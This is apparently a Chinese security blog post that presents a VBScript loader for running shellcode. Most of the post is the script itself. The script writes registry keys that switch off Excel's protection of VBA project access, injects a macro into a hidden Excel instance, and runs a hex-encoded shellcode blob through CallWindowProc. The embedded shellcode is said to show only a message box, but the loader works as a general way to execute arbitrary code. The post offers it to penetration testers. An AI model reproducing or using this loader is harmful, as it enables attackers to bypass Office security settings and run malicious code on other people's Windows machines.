利用vbs优雅的执行shellcode

VBScript(Microsoft Visual Basic Script Editon),微软公司可视化BASIC脚本版). 正如其字面所透露的信息, VBS(VBScript的进一步简写)是基于Visual Basic的脚本语言。

lcx分享了如何利用vbs执行shellcode,相信对各位安全研究者在渗透测试过程中能起到一定作用,源代码如下: 


'thanks http://demon.tw/.shellcode是个弹框的,无害
'众所周知,vbs执行api都困难,但是还是可以实现的。这是 vbs,不是vb!
Dim WshShell
Dim oExcel
set WshShell = CreateObject("wscript.Shell")
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\AccessVBOM",1,"REG_DWORD"
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\AccessVBOM",1,"REG_DWORD"
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\AccessVBOM",1,"REG_DWORD"

Sub CreateObj(oExcel)
On Error Resume Next
Set oExcel = CreateObject("excel.application")
If Err Then 
wsh.echo "excel.application not!"
End if
End Sub

CreateObj oExcel

Set oBook = oExcel.Workbooks.Add
Set oModule = obook.VBProject.VBComponents.Add(1)
strCode ="Private Declare Function CallWindowProc Lib ""user32"" Alias ""CallWindowProcA"" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long "  & vbCr & _
"Sub MyMacro" & vbCr & _
"Dim download() As Byte" & vbCr & _
"Dim xmldoc, node, bytes" & vbCr & _
"Set xmldoc = CreateObject(""Msxml2.DOMDocument"")" & vbCr & _
"Set node = xmldoc.CreateElement(""binary"")" & vbCr & _
"node.DataType = ""bin.hex""" & vbCr & _
"node.Text =""eb0e5b4b33c9b19b80340bfee2faeb05e8edffffff177bfefefea19a5fcefefefe75bef2758ee2537596f6750994fca716dbfefefe1c0796cdccfefe968b8d9b8caa01e8751694ffa716f2fefefe1c07afa9a9af01a8f601a8faafa8758bc2758ad086fd0ba87588defd0bcd37b7bf53fd3bcd25f140eec4288af63f35f9fd24be150fc5e18b19a075a0dafd239875f2b575a0e2fd2375fa75fd3b55a0a73d1688010101cc8a6ff29d772fb194f4c6e0686170707920666F72203230303700""" & vbCr & _
"download = node.NodeTypedValue" & vbCr & _
"CallWindowProc VarPtr(download(0)), ByVal 0&, ByVal 0&, ByVal 0&, ByVal 0&" & vbCr & _
"End Sub"
oModule.CodeModule.AddFromString strCode
On Error Resume next
oExcel.Run "MyMacro"
oExcel.DisplayAlerts = False
oBook.Close
oExcel.Quit

参考 http://demon.tw/programming/vbs-excel-invoke-windows-api.html

源链接

Hacking more

...